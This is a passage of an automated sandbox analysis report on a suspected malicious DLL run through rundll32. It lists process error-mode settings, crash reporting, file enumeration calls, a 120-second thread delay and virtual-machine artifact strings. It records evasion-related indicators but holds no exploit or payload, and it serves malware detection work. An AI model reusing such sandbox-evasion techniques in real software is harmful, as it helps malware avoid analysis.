Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E8288 push ecx; mov dword ptr [esp], ecx11_2_6C7E828C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C8E03BC push ecx; mov dword ptr [esp], eax11_2_6C8E03C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C8AA354 push ecx; mov dword ptr [esp], edx11_2_6C8AA355
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.9 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.9 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.9 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7CF9F8 FindFirstFileW,FindClose,8_2_6C7CF9F8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E8C20 FindFirstFileW,FindClose,8_2_6C7E8C20
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7CF414 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,8_2_6C7CF414
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E9194 FindFirstFileW,GetLastError,8_2_6C7E9194
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7CF9F8 FindFirstFileW,FindClose,11_2_6C7CF9F8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E8C20 FindFirstFileW,FindClose,11_2_6C7E8C20
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7CF414 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_6C7CF414
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E9194 FindFirstFileW,GetLastError,11_2_6C7E9194
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_1cfbaf5ca3181558ae23b5af2bc325da778f0_7522e4b5_14134091-3833-4e2b-8109-25cb573f144c\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dbcb93d956ac28a5c3196766f9d12867aad21a0_7522e4b5_15e6224a-47ff-4b73-8f65-4223cf6f8bc8\
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: 0304PT[1].zip.8.drBinary or memory string: 24jZZ45tBpGfkrbY5u81lY3U4/iayMWQvTooajJ8aZAVidoiqHkxjRhGIrxaFAgYUW9uiCthGfSx
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000008.00000002.2944650618.0000000002904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0304PT[1].zip.8.drBinary or memory string: sULiPIQ25hloqemUjDX8xOVGvFnkiGHOCCiXFXjbE3265Vs2Pd8NhhwCMoFpUNbjzGw9ICLygaqI
Source: 0304PT[1].zip.8.drBinary or memory string: SV0HgFs7JJ5yuc9G8Q/6mmjVHK1yheJwR0JYb2pCpPyUgk6kETCMJhJ1pTpGlpvLFasbVU5YpAub
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000008.00000002.2944650618.00000000028AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 0304PT[1].zip.8.drBinary or memory string: Xh2DDnUaIFTCn/LdW981ng3dvjt1sRKAwCqhGmFqsD60akMxKwQEMUFTXnUecidme8PcnRFBY2zi
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
